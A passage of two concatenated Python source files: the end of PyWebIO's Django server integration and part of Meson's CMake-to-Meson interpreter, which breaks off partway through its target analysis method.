return None
def set_header(self, name, value):
"""为当前响应设置header"""
self.response[name] = value
def set_status(self, status: int):
"""为当前响应设置http status"""
self.response.status_code = status
def set_content(self, content, json_type=False):
"""设置相应的内容
:param content:
:param bool json_type: content是否要序列化成json格式,并将 content-type 设置为application/json
"""
if json_type:
self.set_header('content-type', 'application/json')
self.response.content = json.dumps(content)
else:
self.response.content = content
def get_response(self):
"""获取当前的响应对象,用于在私图函数中返回"""
return self.response
def get_client_ip(self):
"""获取用户的ip"""
return self.request.META.get('REMOTE_ADDR')
def webio_view(applications,
session_expire_seconds=None,
session_cleanup_interval=None,
allowed_origins=None, check_origin=None):
"""获取在django中运行PyWebIO任务的视图函数。
基于http请求与前端进行通讯
:param list/dict/callable applications: PyWebIO应用。
:param int session_expire_seconds: 会话不活跃过期时间。
:param int session_cleanup_interval: 会话清理间隔。
:param list allowed_origins: 除当前域名外,服务器还允许的请求的来源列表。
:param callable check_origin: 请求来源检查函数。
关于各参数的详细说明见 :func:`pywebio.platform.django.start_server` 的同名参数。
:return: Django视图函数
"""
handler = HttpHandler(applications=applications,
session_expire_seconds=session_expire_seconds,
session_cleanup_interval=session_cleanup_interval,
allowed_origins=allowed_origins, check_origin=check_origin)
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def view_func(request):
context = DjangoHttpContext(request)
return handler.handle_request(context)
view_func.__name__ = 'webio_view'
return view_func
urlpatterns = []
def start_server(applications, port=8080, host='localhost',
allowed_origins=None, check_origin=None,
disable_asyncio=False,
session_cleanup_interval=None,
session_expire_seconds=None,
debug=False, **django_options):
"""启动一个 Django server 将PyWebIO应用作为Web服务提供。
:param list/dict/callable applications: PyWebIO应用. 格式同 :func:`pywebio.platform.tornado.start_server` 的 ``applications`` 参数
:param int port: 服务监听的端口。设置为 ``0`` 时,表示自动选择可用端口。
:param str host: 服务绑定的地址。 ``host`` 可以是IP地址或者为hostname。如果为hostname,服务会监听所有与该hostname关联的IP地址。
通过设置 ``host`` 为空字符串或 ``None`` 来将服务绑定到所有可用的地址上。
:param list allowed_origins: 除当前域名外,服务器还允许的请求的来源列表。
来源包含协议、域名和端口部分,允许使用 Unix shell 风格的匹配模式(全部规则参见 `Python文档 <https://docs.python.org/zh-tw/3/library/fnmatch.html>`_ ):
- ``*`` 为通配符
- ``?`` 匹配单个字符
- ``[seq]`` 匹配seq中的字符
- ``[!seq]`` 匹配不在seq中的字符
比如 ``https://*.example.com`` 、 ``*://*.example.com``
:param callable check_origin: 请求来源检查函数。接收请求来源(包含协议、域名和端口部分)字符串,
返回 ``True/False`` 。若设置了 ``check_origin`` , ``allowed_origins`` 参数将被忽略
:param bool disable_asyncio: 禁用 asyncio 函数。仅在任务函数为协程函数时有效。
.. note:: 实现说明:
当使用Django backend时,若要在PyWebIO的会话中使用 ``asyncio`` 标准库里的协程函数,PyWebIO需要单独开启一个线程来运行 ``asyncio`` 事件循环,
若程序中没有使用到 ``asyncio`` 中的异步函数,可以开启此选项来避免不必要的资源浪费
:param int session_expire_seconds: 会话过期时间。若 session_expire_seconds 秒内没有收到客户端的请求,则认为会话过期。
:param int session_cleanup_interval: 会话清理间隔。
:param bool debug: 开启 Django debug mode 和一般访问日志的记录
:param django_options: django应用的其他设置,见 https://docs.djangoproject.com/en/3.0/ref/settings/ .
其中 ``DEBUG`` 、 ``ALLOWED_HOSTS`` 、 ``ROOT_URLCONF`` 、 ``SECRET_KEY`` 被PyWebIO设置,无法在 ``django_options`` 中指定
"""
global urlpatterns
from django.conf import settings
from django.core.wsgi import get_wsgi_application
from django.urls import path
from django.utils.crypto import get_random_string
from django.views.static import serve
from django.core.management import call_command
if port == 0:
port = get_free_port()
if not host:
host = '0.0.0.0'
django_options.update(dict(
DEBUG=debug,
ALLOWED_HOSTS=["*"], # Disable host header validation
ROOT_URLCONF=__name__, # Make this module the urlconf
SECRET_KEY=get_random_string(10), # We aren't using any security features but Django requires this setting
))
django_options.setdefault('LOGGING', {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '[%(asctime)s] %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
'django.server': {
'level': 'INFO' if debug else 'WARN',
'handlers': ['console'],
},
},
})
settings.configure(**django_options)
webio_view_func = webio_view(
applications=applications,
session_expire_seconds=session_expire_seconds,
session_cleanup_interval=session_cleanup_interval,
allowed_origins=allowed_origins,
check_origin=check_origin
)
urlpatterns = [
path(r"io", webio_view_func),
path(r'', partial(serve, path='index.html'), {'document_root': STATIC_PATH}),
path(r'<path:path>', serve, {'document_root': STATIC_PATH}),
]
app = get_wsgi_application() # load app
has_coro_target = any(iscoroutinefunction(target) or isgeneratorfunction(target) for
target in make_applications(applications).values())
if not disable_asyncio and has_coro_target:
threading.Thread(target=run_event_loop, daemon=True).start()
# call_command('runserver', '%s:%d' % (host, port))
# or use below code to run web app
import tornado.wsgi
container = tornado.wsgi.WSGIContainer(app)
http_server = tornado.httpserver.HTTPServer(container)
http_server.listen(port, address=host)
tornado.ioloop.IOLoop.current().start()
|
interpreter.py
|
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
from .common import CMakeException, CMakeTarget
from .client import CMakeClient, RequestCMakeInputs, RequestConfigure, RequestCompute, RequestCodeModel
from .fileapi import CMakeFileAPI
from .executor import CMakeExecutor
from .traceparser import CMakeTraceParser, CMakeGeneratorTarget
from .. import mlog
from ..environment import Environment
from ..mesonlib import MachineChoice, version_compare
from ..compilers.compilers import lang_suffixes, header_suffixes, obj_suffixes, lib_suffixes, is_header
from subprocess import Popen, PIPE
from typing import Any, List, Dict, Optional, Union, TYPE_CHECKING
from threading import Thread
from enum import Enum
import os, re
from ..mparser import (
Token,
BaseNode,
CodeBlockNode,
FunctionNode,
ArrayNode,
ArgumentNode,
AssignmentNode,
BooleanNode,
StringNode,
IdNode,
IndexNode,
MethodNode,
NumberNode,
)
if TYPE_CHECKING:
from ..build import Build
from ..backend.backends import Backend
# Disable all warnings automaticall enabled with --trace and friends
# See https://cmake.org/cmake/help/latest/variable/CMAKE_POLICY_WARNING_CMPNNNN.html
disable_policy_warnings = [
'CMP0025',
'CMP0047',
'CMP0056',
'CMP0060',
'CMP0065',
'CMP0066',
'CMP0067',
'CMP0082',
'CMP0089',
]
backend_generator_map = {
'ninja': 'Ninja',
'xcode': 'Xcode',
'vs2010': 'Visual Studio 10 2010',
'vs2015': 'Visual Studio 15 2017',
'vs2017': 'Visual Studio 15 2017',
'vs2019': 'Visual Studio 16 2019',
}
language_map = {
'c': 'C',
'cpp': 'CXX',
'cuda': 'CUDA',
'cs': 'CSharp',
'java': 'Java',
'fortran': 'Fortran',
'swift': 'Swift',
}
target_type_map = {
'STATIC_LIBRARY': 'static_library',
'MODULE_LIBRARY': 'shared_module',
'SHARED_LIBRARY': 'shared_library',
'EXECUTABLE': 'executable',
'OBJECT_LIBRARY': 'static_library',
'INTERFACE_LIBRARY': 'header_only'
}
skip_targets = ['UTILITY']
blacklist_compiler_flags = [
'-Wall', '-Wextra', '-Weverything', '-Werror', '-Wpedantic', '-pedantic', '-w',
'/W1', '/W2', '/W3', '/W4', '/Wall', '/WX', '/w',
'/O1', '/O2', '/Ob', '/Od', '/Og', '/Oi', '/Os', '/Ot', '/Ox', '/Oy', '/Ob0',
'/RTC1', '/RTCc', '/RTCs', '/RTCu',
'/Z7', '/Zi', '/ZI',
]
blacklist_link_flags = [
'/machine:x64', '/machine:x86', '/machine:arm', '/machine:ebc',
'/debug', '/debug:fastlink', '/debug:full', '/debug:none',
'/incremental',
]
blacklist_clang_cl_link_flags = ['/GR', '/EHsc', '/MDd', '/Zi', '/RTC1']
blacklist_link_libs = [
'kernel32.lib',
'user32.lib',
'gdi32.lib',
'winspool.lib',
'shell32.lib',
'ole32.lib',
'oleaut32.lib',
'uuid.lib',
'comdlg32.lib',
'advapi32.lib'
]
generated_target_name_prefix = 'cm_'
transfer_dependencies_from = ['header_only']
class OutputTargetMap:
rm_so_version = re.compile(r'(\.[0-9]+)+$')
def __init__(self, build_dir: str):
self.tgt_map = {}
self.build_dir = build_dir
def add(self, tgt: Union['ConverterTarget', 'ConverterCustomTarget']) -> None:
def assign_keys(keys: List[str]) -> None:
for i in [x for x in keys if x]:
self.tgt_map[i] = tgt
keys = [self._target_key(tgt.cmake_name)]
if isinstance(tgt, ConverterTarget):
keys += [tgt.full_name]
keys += [self._rel_artifact_key(x) for x in tgt.artifacts]
keys += [self._base_artifact_key(x) for x in tgt.artifacts]
if isinstance(tgt, ConverterCustomTarget):
keys += [self._rel_generated_file_key(x) for x in tgt.original_outputs]
keys += [self._base_generated_file_key(x) for x in tgt.original_outputs]
assign_keys(keys)
def _return_first_valid_key(self, keys: List[str]) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
for i in keys:
if i and i in self.tgt_map:
return self.tgt_map[i]
return None
def target(self, name: str) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
return self._return_first_valid_key([self._target_key(name)])
def artifact(self, name: str) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
keys = []
candidates = [name, OutputTargetMap.rm_so_version.sub('', name)]
for i in lib_suffixes:
if not name.endswith('.' + i):
continue
new_name = name[:-len(i) - 1]
new_name = OutputTargetMap.rm_so_version.sub('', new_name)
candidates += ['{}.{}'.format(new_name, i)]
for i in candidates:
keys += [self._rel_artifact_key(i), os.path.basename(i), self._base_artifact_key(i)]
return self._return_first_valid_key(keys)
def generated(self, name: str) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
return self._return_first_valid_key([self._rel_generated_file_key(name), self._base_generated_file_key(name)])
# Utility functions to generate local keys
def _rel_path(self, fname: str) -> Optional[str]:
fname = os.path.normpath(os.path.join(self.build_dir, fname))
if os.path.commonpath([self.build_dir, fname]) != self.build_dir:
return None
return os.path.relpath(fname, self.build_dir)
def _target_key(self, tgt_name: str) -> str:
return '__tgt_{}__'.format(tgt_name)
def _rel_generated_file_key(self, fname: str) -> Optional[str]:
path = self._rel_path(fname)
return '__relgen_{}__'.format(path) if path else None
def _base_generated_file_key(self, fname: str) -> str:
return '__gen_{}__'.format(os.path.basename(fname))
def _rel_artifact_key(self, fname: str) -> Optional[str]:
path = self._rel_path(fname)
return '__relart_{}__'.format(path) if path else None
def _base_artifact_key(self, fname: str) -> str:
return '__art_{}__'.format(os.path.basename(fname))
class ConverterTarget:
def __init__(self, target: CMakeTarget, env: Environment):
self.env = env
self.artifacts = target.artifacts
self.src_dir = target.src_dir
self.build_dir = target.build_dir
self.name = target.name
self.cmake_name = target.name
self.full_name = target.full_name
self.type = target.type
self.install = target.install
self.install_dir = ''
self.link_libraries = target.link_libraries
self.link_flags = target.link_flags + target.link_lang_flags
self.depends_raw = []
self.depends = []
if target.install_paths:
self.install_dir = target.install_paths[0]
self.languages = []
self.sources = []
self.generated = []
self.includes = []
self.sys_includes = []
self.link_with = []
self.object_libs = []
self.compile_opts = {}
self.public_compile_opts = []
self.pie = False
# Project default override options (c_std, cpp_std, etc.)
self.override_options = []
# Convert the target name to a valid meson target name
self.name = self.name.replace('-', '_')
self.name = generated_target_name_prefix + self.name
for i in target.files:
# Determine the meson language
lang_cmake_to_meson = {val.lower(): key for key, val in language_map.items()}
lang = lang_cmake_to_meson.get(i.language.lower(), 'c')
if lang not in self.languages:
self.languages += [lang]
if lang not in self.compile_opts:
self.compile_opts[lang] = []
# Add arguments, but avoid duplicates
args = i.flags
args += ['-D{}'.format(x) for x in i.defines]
self.compile_opts[lang] += [x for x in args if x not in self.compile_opts[lang]]
# Handle include directories
self.includes += [x['path'] for x in i.includes if x not in self.includes and not x['isSystem']]
self.sys_includes += [x['path'] for x in i.includes if x not in self.sys_includes and x['isSystem']]
# Add sources to the right array
if i.is_generated:
self.generated += i.sources
else:
self.sources += i.sources
def __repr__(self) -> str:
return '<{}: {}>'.format(self.__class__.__name__, self.name)
std_regex = re.compile(r'([-]{1,2}std=|/std:v?|[-]{1,2}std:)(.*)')
def postprocess(self, output_target_map: OutputTargetMap, root_src_dir: str, subdir: str, install_prefix: str, trace: CMakeTraceParser) -> None:
# Detect setting the C and C++ standard
for i in ['c', 'cpp']:
if i not in self.compile_opts:
continue
temp = []
for j in self.compile_opts[i]:
m = ConverterTarget.std_regex.match(j)
if m:
self.override_options += ['{}_std={}'.format(i, m.group(2))]
elif j in ['-fPIC', '-fpic', '-fPIE', '-fpie']:
self.pie = True
elif j in blacklist_compiler_flags:
pass
else:
temp += [j]
self.compile_opts[i] = temp
# Make sure to force enable -fPIC for OBJECT libraries
if self.type.upper() == 'OBJECT_LIBRARY':
self.pie = True
# Use the CMake trace, if required
tgt = trace.targets.get(self.cmake_name)
if tgt:
self.depends_raw = trace.targets[self.cmake_name].depends
if self.type.upper() == 'INTERFACE_LIBRARY':
props = tgt.properties
self.includes += props.get('INTERFACE_INCLUDE_DIRECTORIES', [])
self.public_compile_opts += props.get('INTERFACE_COMPILE_DEFINITIONS', [])
self.public_compile_opts += props.get('INTERFACE_COMPILE_OPTIONS', [])
self.link_flags += props.get('INTERFACE_LINK_OPTIONS', [])
elif self.type.upper() not in ['EXECUTABLE', 'OBJECT_LIBRARY']:
mlog.warning('CMake: Target', mlog.bold(self.cmake_name), 'not found in CMake trace. This can lead to build errors')
temp = []
for i in self.link_libraries:
# Let meson handle this arcane magic
if ',-rpath,' in i:
continue
if not os.path.isabs(i):
link_with = output_target_map.artifact(i)
if link_with:
self.link_with += [link_with]
continue
temp += [i]
self.link_libraries = temp
# Filter out files that are not supported by the language
supported = list(header_suffixes) + list(obj_suffixes)
for i in self.languages:
supported += list(lang_suffixes[i])
supported = ['.{}'.format(x) for x in supported]
self.sources = [x for x in self.sources if any([x.endswith(y) for y in supported])]
self.generated = [x for x in self.generated if any([x.endswith(y) for y in supported])]
# Make paths relative
def rel_path(x: str, is_header: bool, is_generated: bool) -> Optional[str]:
if not os.path.isabs(x):
x = os.path.normpath(os.path.join(self.src_dir, x))
if not os.path.exists(x) and not any([x.endswith(y) for y in obj_suffixes]) and not is_generated:
mlog.warning('CMake: path', mlog.bold(x), 'does not exist. Ignoring. This can lead to build errors')
return None
if os.path.isabs(x) and os.path.commonpath([x, self.env.get_build_dir()]) == self.env.get_build_dir():
if is_header:
return os.path.relpath(x, os.path.join(self.env.get_build_dir(), subdir))
else:
return os.path.relpath(x, root_src_dir)
if os.path.isabs(x) and os.path.commonpath([x, root_src_dir]) == root_src_dir:
return os.path.relpath(x, root_src_dir)
return x
def custom_target(x: str):
ctgt = output_target_map.generated(x)
if ctgt:
assert(isinstance(ctgt, ConverterCustomTarget))
ref = ctgt.get_ref(x)
assert(isinstance(ref, CustomTargetReference) and ref.valid())
return ref
return x
build_dir_rel = os.path.relpath(self.build_dir, os.path.join(self.env.get_build_dir(), subdir))
self.includes = list(set([rel_path(x, True, False) for x in set(self.includes)] + [build_dir_rel]))
self.sys_includes = list(set([rel_path(x, True, False) for x in set(self.sys_includes)]))
self.sources = [rel_path(x, False, False) for x in self.sources]
self.generated = [rel_path(x, False, True) for x in self.generated]
# Resolve custom targets
self.generated = [custom_target(x) for x in self.generated]
# Remove delete entries
self.includes = [x for x in self.includes if x is not None]
self.sys_includes = [x for x in self.sys_includes if x is not None]
self.sources = [x for x in self.sources if x is not None]
self.generated = [x for x in self.generated if x is not None]
# Make sure '.' is always in the include directories
if '.' not in self.includes:
self.includes += ['.']
# make install dir relative to the install prefix
if self.install_dir and os.path.isabs(self.install_dir):
if os.path.commonpath([self.install_dir, install_prefix]) == install_prefix:
self.install_dir = os.path.relpath(self.install_dir, install_prefix)
# Remove blacklisted options and libs
def check_flag(flag: str) -> bool:
if flag.lower() in blacklist_link_flags or flag in blacklist_compiler_flags + blacklist_clang_cl_link_flags:
return False
if flag.startswith('/D'):
return False
return True
self.link_libraries = [x for x in self.link_libraries if x.lower() not in blacklist_link_libs]
self.link_flags = [x for x in self.link_flags if check_flag(x)]
# Handle explicit CMake add_dependency() calls
for i in self.depends_raw:
tgt = output_target_map.target(i)
if tgt:
self.depends.append(tgt)
def process_object_libs(self, obj_target_list: List['ConverterTarget']):
# Try to detect the object library(s) from the generated input sources
temp = [x for x in self.generated if isinstance(x, str)]
temp = [os.path.basename(x) for x in temp]
temp = [x for x in temp if any([x.endswith('.' + y) for y in obj_suffixes])]
temp = [os.path.splitext(x)[0] for x in temp]
# Temp now stores the source filenames of the object files
for i in obj_target_list:
source_files = [os.path.basename(x) for x in i.sources + i.generated]
for j in source_files:
if j in temp:
self.object_libs += [i]
break
# Filter out object files from the sources
self.generated = [x for x in self.generated if not isinstance(x, str) or not any([x.endswith('.' + y) for y in obj_suffixes])]
def process_inter_target_dependencies(self):
# Move the dependencies from all transfer_dependencies_from to the target
to_process = list(self.depends)
processed = []
new_deps = []
for i in to_process:
processed += [i]
if isinstance(i, ConverterTarget) and i.meson_func() in transfer_dependencies_from:
to_process += [x for x in i.depends if x not in processed]
else:
new_deps += [i]
self.depends = list(set(new_deps))
def cleanup_dependencies(self):
# Clear the dependencies from targets that where moved from
if self.meson_func() in transfer_dependencies_from:
self.depends = []
def meson_func(self) -> str:
return target_type_map.get(self.type.upper())
def log(self) -> None:
mlog.log('Target', mlog.bold(self.name), '({})'.format(self.cmake_name))
mlog.log(' -- artifacts: ', mlog.bold(str(self.artifacts)))
mlog.log(' -- full_name: ', mlog.bold(self.full_name))
mlog.log(' -- type: ', mlog.bold(self.type))
mlog.log(' -- install: ', mlog.bold('true' if self.install else 'false'))
mlog.log(' -- install_dir: ', mlog.bold(self.install_dir))
mlog.log(' -- link_libraries: ', mlog.bold(str(self.link_libraries)))
mlog.log(' -- link_with: ', mlog.bold(str(self.link_with)))
mlog.log(' -- object_libs: ', mlog.bold(str(self.object_libs)))
mlog.log(' -- link_flags: ', mlog.bold(str(self.link_flags)))
mlog.log(' -- languages: ', mlog.bold(str(self.languages)))
mlog.log(' -- includes: ', mlog.bold(str(self.includes)))
mlog.log(' -- sys_includes: ', mlog.bold(str(self.sys_includes)))
mlog.log(' -- sources: ', mlog.bold(str(self.sources)))
mlog.log(' -- generated: ', mlog.bold(str(self.generated)))
mlog.log(' -- pie: ', mlog.bold('true' if self.pie else 'false'))
mlog.log(' -- override_opts: ', mlog.bold(str(self.override_options)))
mlog.log(' -- depends: ', mlog.bold(str(self.depends)))
mlog.log(' -- options:')
for key, val in self.compile_opts.items():
mlog.log(' -', key, '=', mlog.bold(str(val)))
class CustomTargetReference:
def __init__(self, ctgt: 'ConverterCustomTarget', index: int):
self.ctgt = ctgt # type: ConverterCustomTarget
self.index = index # type: int
def __repr__(self) -> str:
if self.valid():
return '<{}: {} [{}]>'.format(self.__class__.__name__, self.ctgt.name, self.ctgt.outputs[self.index])
else:
return '<{}: INVALID REFERENCE>'.format(self.__class__.__name__)
def valid(self) -> bool:
return self.ctgt is not None and self.index >= 0
def filename(self) -> str:
return self.ctgt.outputs[self.index]
class ConverterCustomTarget:
tgt_counter = 0 # type: int
out_counter = 0 # type: int
def __init__(self, target: CMakeGeneratorTarget):
self.name = target.name
if not self.name:
self.name = 'custom_tgt_{}'.format(ConverterCustomTarget.tgt_counter)
ConverterCustomTarget.tgt_counter += 1
self.cmake_name = str(self.name)
self.original_outputs = list(target.outputs)
self.outputs = [os.path.basename(x) for x in self.original_outputs]
self.conflict_map = {}
self.command = target.command
self.working_dir = target.working_dir
self.depends_raw = target.depends
self.inputs = []
self.depends = []
# Convert the target name to a valid meson target name
self.name = self.name.replace('-', '_')
self.name = generated_target_name_prefix + self.name
def __repr__(self) -> str:
return '<{}: {} {}>'.format(self.__class__.__name__, self.name, self.outputs)
def postprocess(self, output_target_map: OutputTargetMap, root_src_dir: str, subdir: str, build_dir: str, all_outputs: List[str]) -> None:
# Default the working directory to the CMake build dir. This
# is not 100% correct, since it should be the value of
# ${CMAKE_CURRENT_BINARY_DIR} when add_custom_command is
# called. However, keeping track of this variable is not
# trivial and the current solution should work in most cases.
if not self.working_dir:
self.working_dir = build_dir
# relative paths in the working directory are always relative
# to ${CMAKE_CURRENT_BINARY_DIR} (see note above)
if not os.path.isabs(self.working_dir):
self.working_dir = os.path.normpath(os.path.join(build_dir, self.working_dir))
# Modify the original outputs if they are relative. Again,
# relative paths are relative to ${CMAKE_CURRENT_BINARY_DIR}
# and the first disclaimer is still in effect
def ensure_absolute(x: str):
if os.path.isabs(x):
return x
else:
return os.path.normpath(os.path.join(build_dir, x))
self.original_outputs = [ensure_absolute(x) for x in self.original_outputs]
# Ensure that there is no duplicate output in the project so
# that meson can handle cases where the same filename is
# generated in multiple directories
temp_outputs = [] # type: List[str]
for i in self.outputs:
if i in all_outputs:
old = str(i)
i = 'c{}_{}'.format(ConverterCustomTarget.out_counter, i)
ConverterCustomTarget.out_counter += 1
self.conflict_map[old] = i
all_outputs += [i]
temp_outputs += [i]
self.outputs = temp_outputs
# Check if the command is a build target
commands = []
for i in self.command:
assert(isinstance(i, list))
cmd = []
for j in i:
if not j:
continue
target = output_target_map.target(j)
cmd += [target] if target else [j]
commands += [cmd]
self.command = commands
# If the custom target does not declare any output, create a dummy
# one that can be used as dependency.
if not self.outputs:
self.outputs = [self.name + '.h']
# Check dependencies and input files
for i in self.depends_raw:
if not i:
continue
art = output_target_map.artifact(i)
tgt = output_target_map.target(i)
gen = output_target_map.generated(i)
if art:
self.depends += [art]
elif tgt:
self.depends += [tgt]
elif gen:
self.inputs += [gen.get_ref(i)]
elif not os.path.isabs(i) and os.path.exists(os.path.join(root_src_dir, i)):
self.inputs += [i]
elif os.path.isabs(i) and os.path.exists(i) and os.path.commonpath([i, root_src_dir]) == root_src_dir:
self.inputs += [os.path.relpath(i, root_src_dir)]
def process_inter_target_dependencies(self):
# Move the dependencies from all transfer_dependencies_from to the target
to_process = list(self.depends)
processed = []
new_deps = []
for i in to_process:
processed += [i]
if isinstance(i, ConverterTarget) and i.meson_func() in transfer_dependencies_from:
to_process += [x for x in i.depends if x not in processed]
else:
new_deps += [i]
self.depends = list(set(new_deps))
def get_ref(self, fname: str) -> Optional[CustomTargetReference]:
fname = os.path.basename(fname)
try:
if fname in self.conflict_map:
fname = self.conflict_map[fname]
idx = self.outputs.index(fname)
return CustomTargetReference(self, idx)
except ValueError:
return None
def log(self) -> None:
mlog.log('Custom Target', mlog.bold(self.name))
mlog.log(' -- command: ', mlog.bold(str(self.command)))
mlog.log(' -- outputs: ', mlog.bold(str(self.outputs)))
mlog.log(' -- conflict_map: ', mlog.bold(str(self.conflict_map)))
mlog.log(' -- working_dir: ', mlog.bold(str(self.working_dir)))
mlog.log(' -- depends_raw: ', mlog.bold(str(self.depends_raw)))
mlog.log(' -- inputs: ', mlog.bold(str(self.inputs)))
mlog.log(' -- depends: ', mlog.bold(str(self.depends)))
class CMakeAPI(Enum):
SERVER = 1
FILE = 2
class CMakeInterpreter:
def __init__(self, build: 'Build', subdir: str, src_dir: str, install_prefix: str, env: Environment, backend: 'Backend'):
assert(hasattr(backend, 'name'))
self.build = build
self.subdir = subdir
self.src_dir = src_dir
self.build_dir_rel = os.path.join(subdir, '__CMake_build')
self.build_dir = os.path.join(env.get_build_dir(), self.build_dir_rel)
self.install_prefix = install_prefix
self.env = env
self.backend_name = backend.name
self.cmake_api = CMakeAPI.SERVER
self.client = CMakeClient(self.env)
self.fileapi = CMakeFileAPI(self.build_dir)
# Raw CMake results
self.bs_files = []
self.codemodel_configs = None
self.raw_trace = None
# Analysed data
self.project_name = ''
self.languages = []
self.targets = []
self.custom_targets = [] # type: List[ConverterCustomTarget]
self.trace = CMakeTraceParser()
self.output_target_map = OutputTargetMap(self.build_dir)
# Generated meson data
self.generated_targets = {}
self.internal_name_map = {}
def configure(self, extra_cmake_options: List[str]) -> None:
for_machine = MachineChoice.HOST # TODO make parameter
# Find CMake
cmake_exe = CMakeExecutor(self.env, '>=3.7', for_machine)
if not cmake_exe.found():
raise CMakeException('Unable to find CMake')
generator = backend_generator_map[self.backend_name]
cmake_args = cmake_exe.get_command()
trace_args = ['--trace', '--trace-expand', '--no-warn-unused-cli']
cmcmp_args = ['-DCMAKE_POLICY_WARNING_{}=OFF'.format(x) for x in disable_policy_warnings]
if version_compare(cmake_exe.version(), '>=3.14'):
self.cmake_api = CMakeAPI.FILE
self.fileapi.setup_request()
# Map meson compiler to CMake variables
for lang, comp in self.env.coredata.compilers[for_machine].items():
if lang not in language_map:
continue
cmake_lang = language_map[lang]
exelist = comp.get_exelist()
if len(exelist) == 1:
cmake_args += ['-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[0])]
elif len(exelist) == 2:
cmake_args += ['-DCMAKE_{}_COMPILER_LAUNCHER={}'.format(cmake_lang, exelist[0]),
'-DCMAKE_{}_COMPILER={}'.format(cmake_lang, exelist[1])]
if hasattr(comp, 'get_linker_exelist') and comp.get_id() == 'clang-cl':
cmake_args += ['-DCMAKE_LINKER={}'.format(comp.get_linker_exelist()[0])]
cmake_args += ['-G', generator]
cmake_args += ['-DCMAKE_INSTALL_PREFIX={}'.format(self.install_prefix)]
cmake_args += extra_cmake_options
# Run CMake
mlog.log()
with mlog.nested():
mlog.log('Configuring the build directory with', mlog.bold('CMake'), 'version', mlog.cyan(cmake_exe.version()))
mlog.log(mlog.bold('Running:'), ' '.join(cmake_args))
mlog.log(mlog.bold(' - build directory: '), self.build_dir)
mlog.log(mlog.bold(' - source directory: '), self.src_dir)
mlog.log(mlog.bold(' - trace args: '), ' '.join(trace_args))
mlog.log(mlog.bold(' - disabled policy warnings:'), '[{}]'.format(', '.join(disable_policy_warnings)))
mlog.log()
os.makedirs(self.build_dir, exist_ok=True)
os_env = os.environ.copy()
os_env['LC_ALL'] = 'C'
final_command = cmake_args + trace_args + cmcmp_args + [self.src_dir]
proc = Popen(final_command, stdout=PIPE, stderr=PIPE, cwd=self.build_dir, env=os_env)
def print_stdout():
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode('utf-8').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
# Read stderr line by line and log non trace lines
self.raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line = proc.stderr.readline()
if not line:
break
line = line.decode('utf-8')
if tline_start_reg.match(line):
self.raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
self.raw_trace += line
else:
mlog.warning(line.strip('\n'))
proc.stderr.close()
proc.wait()
t.join()
mlog.log()
h = mlog.green('SUCCEEDED') if proc.returncode == 0 else mlog.red('FAILED')
mlog.log('CMake configuration:', h)
if proc.returncode != 0:
raise CMakeException('Failed to configure the CMake subproject')
def initialise(self, extra_cmake_options: List[str]) -> None:
# Run configure the old way because doing it
# with the server doesn't work for some reason
# Additionally, the File API requires a configure anyway
self.configure(extra_cmake_options)
# Continue with the file API If supported
if self.cmake_api is CMakeAPI.FILE:
# Parse the result
self.fileapi.load_reply()
# Load the buildsystem file list
cmake_files = self.fileapi.get_cmake_sources()
self.bs_files = [x.file for x in cmake_files if not x.is_cmake and not x.is_temp]
self.bs_files = [os.path.relpath(x, self.env.get_source_dir()) for x in self.bs_files]
self.bs_files = list(set(self.bs_files))
# Load the codemodel configurations
self.codemodel_configs = self.fileapi.get_cmake_configurations()
return
with self.client.connect():
generator = backend_generator_map[self.backend_name]
self.client.do_handshake(self.src_dir, self.build_dir, generator, 1)
# Do a second configure to initialise the server
self.client.query_checked(RequestConfigure(), 'CMake server configure')
# Generate the build system files
self.client.query_checked(RequestCompute(), 'Generating build system files')
# Get CMake build system files
bs_reply = self.client.query_checked(RequestCMakeInputs(), 'Querying build system files')
# Now get the CMake code model
cm_reply = self.client.query_checked(RequestCodeModel(), 'Querying the CMake code model')
src_dir = bs_reply.src_dir
self.bs_files = [x.file for x in bs_reply.build_files if not x.is_cmake and not x.is_temp]
self.bs_files = [os.path.relpath(os.path.join(src_dir, x), self.env.get_source_dir()) for x in self.bs_files]
self.bs_files = list(set(self.bs_files))
self.codemodel_configs = cm_reply.configs
def analyse(self) -> None:
if self.codemodel_configs is None:
raise CMakeException('CMakeInterpreter was not initialized')
# Clear analyser data
self.project_name = ''
self.languages = []
self.targets = []
self.custom_targets = []
self.trace = CMakeTraceParser(permissive=True)
# Parse the trace
self.trace.parse(self.raw_trace)
# Find all targets
for i in self.codemodel_configs:
for j in i.projects:
if not self.project_name:
self.project_name = j.name
for k in j.targets:
if k.type not in skip_targets:
self.targets += [ConverterTarget(k, self.env)]
# Add interface targets from trace, if not already present.
# This step is required because interface targets were removed from
# the CMake file API output.
api_target_name_list = [x.name for x in self.targets]
for i in self.trace.targets.values():
if i.type != 'INTERFACE' or i.name in api_target_name_list or i.imported:
continue
dummy = CMakeTarget({
'name': i.name,
'type': 'INTERFACE_LIBRARY',
'sourceDirectory': self.src_dir,
'buildDirectory': self.build_dir,
})
self.targets += [ConverterTarget(dummy, self.env)]
for i in self.trace.custom_targets:
self.custom_targets += [ConverterCustomTarget(i)]
# generate the output_target_map
for i in [*self.targets, *self.custom_targets]:
self.output_target_map.add(i)
# First pass: Basic target cleanup
object_libs = []
custom_target_outputs = [] # type: List[str]
for i in self.custom_targets:
